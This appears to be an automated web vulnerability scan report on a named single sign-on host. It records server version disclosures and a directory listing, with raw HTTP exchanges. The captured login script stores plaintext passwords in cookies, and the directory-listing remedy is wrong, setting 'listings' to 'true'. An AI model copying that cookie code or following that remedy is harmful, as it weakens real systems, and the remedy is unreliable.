<td valign="top"> <form method="post" action="" id="login" name="login"> <table border="0" cellpadding="0" cellspacing="0" width="292px" align="left"> <!-- login form start --> <tr> <td align="left" valign="left"> <SPAN style='font-family:"Trebuchet MS", Arial, Helvetica, sans-serif;font-weight:bold;font-size:10pt' id='productTitle'>@Plan</SPAN> </td> </tr> <tr> <td height="16px" align="left" valign="left" style="color:red;"> <div id="error" class="errorDiv"> </div> </td> </tr> <tr> <td valign="left"> <table align="left" border="0" width="292" cellpadding="0" cellspacing="0"> <tr> <td align="left"> <input class="inputForm" size="27" maxlength="150" id="input_username" name="input_username" onFocus="if(this.value=='Username'){this.value=''};" onkeypress="return check_onkeypress(this,event)" type="text" value="Username"> <input type="hidden" name="josso_cmd" value="login"> <input type="hidden" name="josso_username" value=""> <input type="hidden" name="product_id" value="6"/> </td> </tr> <tr> <td align="left"> <input class="inputForm" size="27" maxlength="150" id="josso_password" name="josso_password" onFocus="if(this.value=='password'){this.value=''};" onkeypress="return check_onkeypress(this,event)" type=password value="password"/></td> </tr> <tr> <td>&nbsp;</td> </tr> <tr> <td align="left" valign="center"> <div> <input id="input_remember" type="checkbox">&nbsp; <span class="text">remember me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input value="Submit" class="btnActive" type="button" onclick="javascript:doSubmit();" onMouseOver> </div> </td> </tr> </table></td> </tr> <!-- login form end --> </table> </form> </td> </table> <!--Gray border table end--> </td> </tr> </table> </form><script>var josso_product_id = '6';var josso_cookie_name = 'ntrt_josso_user';var josso_cookie_pass = 'ntrt_josso_pass';var josso_delimiter = ':';function check_onkeypress(element,e){ var whichCode = (window.Event) ? e.which : window.event.keyCode; if (whichCode == 13) doSubmit();} function doSubmit(){ var uname = document.getElementById('input_username').value.replace(' ', ''); if (!uname || !document.usernamePasswordLoginForm.josso_password.value) { document.getElementById("error").innerHTML = 'You need to enter your login and password.'; return false; } //alert("josso_product_id ===="+josso_product_id); //alert("UName ===="+uname); //alert("Pwd ===="+document.usernamePasswordLoginForm.josso_password.value); document.usernamePasswordLoginForm.josso_username.value = uname + josso_delimiter + josso_product_id; var hasRemember = document.getElementById('input_remember').checked; setCookie(josso_cookie_name, uname, hasRemember); setCookie(josso_cookie_pass, document.usernamePasswordLoginForm.josso_password.value, hasRemember); document.usernamePasswordLoginForm.submit();}function getCookie(name){ var nameEQ = name + "="; var ca = document.cookie.split(';'); for (var i=0; i < ca.length; i++) { var c = ca[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null;}function setCookie(name, value, doSet){ var date = new Date(); date.setTime(date.getTime()+(1000*24*60*60*1000)); document.cookie = name + '=' + (doSet ? value : '') + '; path=/ ; expires=' + (doSet ? date.toGMTString() : 'Thu, 01-Jan-70 00:00:01 GMT') + ';';}function recallCookie(){ var uname = document.usernamePasswordLoginForm.josso_username.value; var usave = getCookie(josso_cookie_name); uname = (uname ? uname.split(josso_delimiter)[0] : usave); document.getElementById('input_remember').checked = (usave ? true : false);// document.getElementById('login_message').style.visibility = (josso_product_id == '6' ? 'visible' : 'hidden'); if (uname) { document.getElementById('input_username').value = uname; var pass = getCookie(josso_cookie_pass); if (pass) document.usernamePasswordLoginForm.josso_password.value = pass; document.usernamePasswordLoginForm.josso_password.focus(); } else { document.getElementById('input_username').focus(); }}function pageOnLoad(){ //document.getElementById('loginPageImg').style.visibility='visible'; recallCookie();}</script> <p>&nbsp;</p> <p>&nbsp;</p> <script language="javascript" src="../ref/login_cookie_autofill.js"></script> <a id="popup" href="#" style="z-index:1">Browers/Support Details <span id="popbox"> <div class="rem"> <u>Browsers Supported</u>:<br> IE 6.0+<br> FireFox 1.0+<br> <br> <u>Other Requirements</u>:<br> Windows XP, 2000, 98, NT4<br>Mac OS X <br> Screen Resolution: 1024x768<br> JavaScript 1.2+<br> Cookies enabled<br> Flash 3+ (recommended) </div> </span></a> </td> </tr> </table> </div> <div class="servSpec">This product and associated modules and services are protected by one or more of the following United States patents and their foreign counterparts: 5,675,510, 5,796,952, 6,108,637, 6,115,680, 6,138,155, 6,643,696 and 6,673,386. Other patents pending. </div> </div> <br> <div class="decoBottom">&nbsp;</div> </div> </div></td> <!--<div class="REL"> --> <td valign="top"> <!--bd right--> <div id="right"> <div class="REL" align="left"> <div class="title" align="left">&nbsp;&nbsp;Important Product News</div> <table border="0" cellpadding="0" cellspacing="4" class="item"> <!--<tr> <td colspan="2"> <div class="text"> <p>Request a Demo</p> </div> </td> </tr>--> <tr> <td ><div class="icon"&..
Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /josso/

/josso/

http://ssoprod.netratings.com/josso/

Extracted Version

2.2.3 (Unix)

Request

GET /josso/ HTTP/1.1
Referer: http://ssoprod.netratings.com/josso/signon/?product_id=6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ssoprod.netratings.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Fri, 29 Apr 2011 14:20:27 GMT
Server: Apache/2.2.3 (Unix)
Content-Length: 204
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /josso/ was not found on this server.</p></body></html>
Tomcat Version Disclosure

Tomcat Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is Tomcat. This information was gathered from the HTTP Headers.

Impact

An attacker can look for specific security vulnerabilities for the version disclosed by the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /josso/ref/

/josso/ref/

http://ssoprod.netratings.com/josso/ref/

Extracted Version

Apache Tomcat/5.5.20

Request

GET /josso/ref/ HTTP/1.1
Referer: http://ssoprod.netratings.com/josso/ref/nielsen_login.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ssoprod.netratings.com
Cookie: JSESSIONID=3AA761F94AA76886B4516B6961127C9C.a01
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 14:20:28 GMT
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/html;charset=UTF-8
Expires: Fri, 29 Apr 2011 16:20:28 GMT
Transfer-Encoding: chunked


<html>
<head>
<title>Directory Listing For /ref/</title>
<STYLE><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></STYLE> </head>
<body><h1>Directory Listing For /ref/ - <a href="/josso/"><b>Up To /</b></a></h1><HR size="1" noshade="noshade"><table width="100%" cellspacing="0" cellpadding="5" align="center">
<tr>
<td align="left"><font size="+1"><strong>Filename</strong></font></td>
<td align="center"><font size="+1"><strong>Size</strong></font></td>
<td align="right"><font size="+1"><strong>Last Modified</strong></font></td>
</tr><tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/CVS/"><tt>CVS/</tt></a></td>
<td align="right"><tt>&nbsp;</tt></td>
<td align="right"><tt>Tue, 05 Feb 2008 21:05:18 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/arrow_blue.gif"><tt>arrow_blue.gif</tt></a></td>
<td align="right"><tt>0.1 kb</tt></td>
<td align="right"><tt>Tue, 09 Jun 2009 01:25:00 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/banner.gif"><tt>banner.gif</tt></a></td>
<td align="right"><tt>73.5 kb</tt></td>
<td align="right"><tt>Sat, 01 Aug 2009 03:22:43 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/banner.jpg"><tt>banner.jpg</tt></a></td>
<td align="right"><tt>110.2 kb</tt></td>
<td align="right"><tt>Thu, 23 Jul 2009 19:18:22 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/button_ground.gif"><tt>button_ground.gif</tt></a></td>
<td align="right"><tt>0.1 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/button_ground_bl.gif"><tt>button_ground_bl.gif</tt></a></td>
<td align="right"><tt>0.1 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/currentYear.htm"><tt>currentYear.htm</tt></a></td>
<td align="right"><tt>0.3 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/currentYear.js"><tt>currentYear.js</tt></a></td>
<td align="right"><tt>0.1 kb</tt></td>
<td align="right"><tt>Tue, 24 Jul 2007 21:51:46 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/demo.gif"><tt>demo.gif</tt></a></td>
<td align="right"><tt>1.2 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/enterSubmit.js"><tt>enterSubmit.js</tt></a></td>
<td align="right"><tt>0.3 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/focusForm.js"><tt>focusForm.js</tt></a></td>
<td align="right"><tt>0.8 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/footer_contact.gif"><tt>footer_contact.gif</tt></a></td>
<td align="right"><tt>1.0 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/global_banner.gif"><tt>global_banner.gif</tt></a></td>
<td align="right"><tt>9.1 kb</tt></td>
<td align="right"><tt>Thu, 30 Jul 2009 19:42:00 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/header_01.gif"><tt>header_01.gif</tt></a></td>
<td align="right"><tt>0.2 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/header_02.gif"><tt>header_02.gif</tt></a></td>
<td align="right"><tt>1.4 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/icon_cl_news.gif"><tt>icon_cl_news.gif</tt></a></td>
<td align="right"><tt>2.0 kb</tt></td>
<td align="right"><tt>Wed, 19 Nov 2008 20:22:08 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/icon_cl_train.gif"><tt>icon_cl_train.gif</tt></a></td>
<td align="right"><tt>0.8 kb</tt></td>
<td align="right"><tt>Wed, 19 Nov 2008 20:22:08 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/icon_vc.gif"><tt>icon_vc.gif</tt></a></td>
<td align="right"><tt>0.9 kb</tt></td>
<td align="right"><tt>Wed, 19 Nov 2008 20:22:08 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/img_swap.js"><tt>img_swap.js</tt></a></td>
<td align="right"><tt>0.8 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/legal.js"><tt>legal.js</tt></a></td>
<td align="right"><tt>0.9 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login.gif"><tt>login.gif</tt></a></td>
<td align="right"><tt>1.1 kb</tt></td>
<td align="right"><tt>Tue, 09 Jun 2009 01:25:00 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_1.gif"><tt>login_1.gif</tt></a></td>
<td align="right"><tt>1.2 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_2.gif"><tt>login_2.gif</tt></a></td>
<td align="right"><tt>1.2 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_6.gif"><tt>login_6.gif</tt></a></td>
<td align="right"><tt>0.6 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_7.gif"><tt>login_7.gif</tt></a></td>
<td align="right"><tt>0.7 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_atp.gif"><tt>login_atp.gif</tt></a></td>
<td align="right"><tt>0.6 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_bottom.gif"><tt>login_bottom.gif</tt></a></td>
<td align="right"><tt>7.3 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_cookie.js"><tt>login_cookie.js</tt></a></td>
<td align="right"><tt>3.1 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_cookie_autofill.js"><tt>login_cookie_autofill.js</tt></a></td>
<td align="right"><tt>2.3 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_nvw.gif"><tt>login_nvw.gif</tt></a></td>
<td align="right"><tt>1.5 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_sit.gif"><tt>login_sit.gif</tt></a></td>
<td align="right"><tt>0.7 kb</tt></td>
<td align="right"><tt>Tue, 24 Jul 2007 22:09:46 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_top.gif"><tt>login_top.gif</tt></a></td>
<td align="right"><tt>7.2 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/login_wb0706.gif"><tt>login_wb0706.gif</tt></a></td>
<td align="right"><tt>0.9 kb</tt></td>
<td align="right"><tt>Wed, 19 Nov 2008 20:22:08 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/logo.gif"><tt>logo.gif</tt></a></td>
<td align="right"><tt>4.2 kb</tt></td>
<td align="right"><tt>Thu, 20 Nov 2008 17:47:14 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/m%281%29.gif"><tt>m(1).gif</tt></a></td>
<td align="right"><tt>0.1 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/m.gif"><tt>m.gif</tt></a></td>
<td align="right"><tt>0.1 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/main.css"><tt>main.css</tt></a></td>
<td align="right"><tt>53.2 kb</tt></td>
<td align="right"><tt>Fri, 21 Nov 2008 23:42:54 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/map.gif"><tt>map.gif</tt></a></td>
<td align="right"><tt>16.6 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/mobile.gif"><tt>mobile.gif</tt></a></td>
<td align="right"><tt>47.9 kb</tt></td>
<td align="right"><tt>Tue, 09 Jun 2009 19:51:00 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/nav.js"><tt>nav.js</tt></a></td>
<td align="right"><tt>0.9 kb</tt></td>
<td align="right"><tt>Tue, 24 Jul 2007 21:51:44 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/nav_bottom.jpg"><tt>nav_bottom.jpg</tt></a></td>
<td align="right"><tt>0.6 kb</tt></td>
<td align="right"><tt>Tue, 09 Jun 2009 01:25:00 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/nav_top.jpg"><tt>nav_top.jpg</tt></a></td>
<td align="right"><tt>0.3 kb</tt></td>
<td align="right"><tt>Tue, 09 Jun 2009 01:25:00 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/nielsen.gif"><tt>nielsen.gif</tt></a></td>
<td align="right"><tt>2.5 kb</tt></td>
<td align="right"><tt>Tue, 09 Jun 2009 01:25:00 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/nielsen_login.css"><tt>nielsen_login.css</tt></a></td>
<td align="right"><tt>6.3 kb</tt></td>
<td align="right"><tt>Thu, 17 Sep 2009 23:26:11 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/nn_click.js"><tt>nn_click.js</tt></a></td>
<td align="right"><tt>0.7 kb</tt></td>
<td align="right"><tt>Wed, 19 Aug 2009 05:20:43 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/nnselect.js"><tt>nnselect.js</tt></a></td>
<td align="right"><tt>5.1 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
&..
Java Servlet Version Disclosure

Java Servlet Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is using Java Servlet. This information was gathered from the HTTP Headers.

Impact

An attacker can look for specific security vulnerabilities for the version disclosed by the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /josso/ref/enterSubmit.js

/josso/ref/enterSubmit.js

http://ssoprod.netratings.com/josso/ref/enterSubmit.js

Extracted Version

Servlet 2.4

Request

GET /josso/ref/enterSubmit.js HTTP/1.1
Referer: http://ssoprod.netratings.com/josso/signon/?product_id=6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ssoprod.netratings.com
Cookie: JSESSIONID=3AA761F94AA76886B4516B6961127C9C.a01
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 14:20:27 GMT
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
ETag: W/"336-1182809415000"
Last-Modified: Mon, 25 Jun 2007 22:10:15 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding:
Expires: Sat, 30 Apr 2011 14:20:27 GMT
Content-Length: 225


function check_onkeypress(element,e){ var whichCode = (window.Event) ? e.which : window.event.keyCode; if (whichCode == 13) //catch "enter button" event { element.form.submit(); }} function init(p_msg) { document.sub_login_frm.p_logon.focus(); if (p_msg != '') { alert(p_msg); } }
Directory Listing (Tomcat)

Directory Listing (Tomcat)

1 TOTAL
INFORMATION
Web server responded with a list of files located in the target directory.

Impact

An attacker can see a list of files located in the directory and download files which disclose sensitive information.

Actions to Take

  1. See the remedy for solution.
  2. Configure the webserver to disallow directory listing requests
  3. Ensure that all current security patches have been applied to the web server.

Remedy

Apply the following configuration to your web.xml for securing your Tomcat installation against directory listing attacks :
<init-param>
        <param-name>listings</param-name>
        <param-value>true</param-value>
</init-param>

External References

Remedy References

- /josso/ref/

/josso/ref/

http://ssoprod.netratings.com/josso/ref/

Request

GET /josso/ref/ HTTP/1.1
Referer: http://ssoprod.netratings.com/josso/ref/nielsen_login.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ssoprod.netratings.com
Cookie: JSESSIONID=3AA761F94AA76886B4516B6961127C9C.a01
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 14:20:28 GMT
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/html;charset=UTF-8
Expires: Fri, 29 Apr 2011 16:20:28 GMT
Transfer-Encoding: chunked


<html>
<head>
<title>Directory Listing For /ref/</title>
<STYLE><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></STYLE> </head>
<body><h1>Directory Listing For /ref/ - <a href="/josso/"><b>Up To /</b></a></h1><HR size="1" noshade="noshade"><table width="100%" cellspacing="0" cellpadding="5" align="center">
<tr>
<td align="left"><font size="+1"><strong>Filename</strong></font></td>
<td align="center"><font size="+1"><strong>Size</strong></font></td>
<td align="right"><font size="+1"><strong>Last Modified</strong></font></td>
</tr><tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/CVS/"><tt>CVS/</tt></a></td>
<td align="right"><tt>&nbsp;</tt></td>
<td align="right"><tt>Tue, 05 Feb 2008 21:05:18 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/arrow_blue.gif"><tt>arrow_blue.gif</tt></a></td>
<td align="right"><tt>0.1 kb</tt></td>
<td align="right"><tt>Tue, 09 Jun 2009 01:25:00 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/banner.gif"><tt>banner.gif</tt></a></td>
<td align="right"><tt>73.5 kb</tt></td>
<td align="right"><tt>Sat, 01 Aug 2009 03:22:43 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/banner.jpg"><tt>banner.jpg</tt></a></td>
<td align="right"><tt>110.2 kb</tt></td>
<td align="right"><tt>Thu, 23 Jul 2009 19:18:22 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/button_ground.gif"><tt>button_ground.gif</tt></a></td>
<td align="right"><tt>0.1 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/button_ground_bl.gif"><tt>button_ground_bl.gif</tt></a></td>
<td align="right"><tt>0.1 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/currentYear.htm"><tt>currentYear.htm</tt></a></td>
<td align="right"><tt>0.3 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/currentYear.js"><tt>currentYear.js</tt></a></td>
<td align="right"><tt>0.1 kb</tt></td>
<td align="right"><tt>Tue, 24 Jul 2007 21:51:46 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/demo.gif"><tt>demo.gif</tt></a></td>
<td align="right"><tt>1.2 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/enterSubmit.js"><tt>enterSubmit.js</tt></a></td>
<td align="right"><tt>0.3 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/focusForm.js"><tt>focusForm.js</tt></a></td>
<td align="right"><tt>0.8 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/footer_contact.gif"><tt>footer_contact.gif</tt></a></td>
<td align="right"><tt>1.0 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/global_banner.gif"><tt>global_banner.gif</tt></a></td>
<td align="right"><tt>9.1 kb</tt></td>
<td align="right"><tt>Thu, 30 Jul 2009 19:42:00 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/header_01.gif"><tt>header_01.gif</tt></a></td>
<td align="right"><tt>0.2 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/header_02.gif"><tt>header_02.gif</tt></a></td>
<td align="right"><tt>1.4 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/icon_cl_news.gif"><tt>icon_cl_news.gif</tt></a></td>
<td align="right"><tt>2.0 kb</tt></td>
<td align="right"><tt>Wed, 19 Nov 2008 20:22:08 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/icon_cl_train.gif"><tt>icon_cl_train.gif</tt></a></td>
<td align="right"><tt>0.8 kb</tt></td>
<td align="right"><tt>Wed, 19 Nov 2008 20:22:08 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/icon_vc.gif"><tt>icon_vc.gif</tt></a></td>
<td align="right"><tt>0.9 kb</tt></td>
<td align="right"><tt>Wed, 19 Nov 2008 20:22:08 GMT</tt></td>
</tr>
<tr>
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/img_swap.js"><tt>img_swap.js</tt></a></td>
<td align="right"><tt>0.8 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr bgcolor="#eeeeee">
<td align="left">&nbsp;&nbsp;
<a href="/josso/ref/legal.js"><tt>legal.js</tt></a></td>
<td align="right"><tt>0.9 kb</tt></td>
<td align="right"><tt>Mon, 25 Jun 2007 22:10:15 GMT</tt></td>
</tr>
<tr>
